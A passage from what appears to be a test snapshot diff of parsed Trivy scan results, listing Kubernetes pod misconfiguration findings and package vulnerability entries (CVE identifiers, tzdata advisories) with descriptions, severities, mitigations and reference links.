"scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3134-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3161-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3366-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u11", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3412-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0040", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0040", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://avd.aquasec.com/misconfig/kcv0040", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", ], }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3134-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3161-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3366-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u11", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3412-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0033", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0033", + ], + }, + "category": "Misconfiguration", + "description": "Activate garbage collector on pod termination, as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", + "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://avd.aquasec.com/misconfig/kcv0033", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0034", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0034", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://avd.aquasec.com/misconfig/kcv0034", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + 